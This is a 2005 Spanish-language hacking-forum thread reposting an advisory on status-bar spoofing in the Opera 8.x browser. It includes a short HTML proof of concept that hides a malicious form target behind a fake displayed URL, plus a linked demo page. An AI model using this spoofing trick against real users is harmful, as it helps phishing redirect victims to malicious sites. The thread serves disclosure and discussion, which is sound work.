elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:35  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability  (Leído 742 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability
« en: 17 Noviembre 2005, 02:53 »

Vulnerable
------------
Opera Web Browser 8.50
Opera Web Browser 8.0 2
Opera Web Browser 8.0 1
Opera Web Browser 8.0

Detalle:
---------
Un atacante puede falsificar la barra de estado del browser, permitiendo que la victima sea engañada y redireccionada a un sitio malicioso.
esta vulnerabilidad podria ser explotada, enviando un enlace HTML via e-mail, o mediante HTML injection en una web vulnerable.

Prueba de Concepto:
------------------------
Código:
<form action="[sitio malicioso]">
<a href="www.example.com"><input type="imagen" src="[imagen]" title="www.example.com"></a>
</form>

Prueba:
---------

http://ciberia.ya.com/webmousehack/operabug.html

al hacer click en este enlace se vera una imagen, si posicionas el cursor sobre ella indicara ¨www.google.com¨ y si hacemos doble click en la misma te redirecionara a esta web.

NOTA: no funciona con firefox pero si con IE

fuente:securityfocus

Salu2
« Última modificación: 17 Noviembre 2005, 02:56 por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Ertai
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.026


Ralph Wiggum


Ver Perfil
Re: Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability
« Respuesta #1 en: 17 Noviembre 2005, 14:28 »

Probado con IE desde el trabajo.

Cuando pasas el mouse por encima sale:

Código:
http://ciberia.ya.com/webmousehack/www.google.com

Saludos.

EDIT: Prueba de poner http://www.google.com, creo que es eso, te falta el http.
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability
« Respuesta #2 en: 17 Noviembre 2005, 14:49 »

corregido! ;) gracias por hacermelo notar :)

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines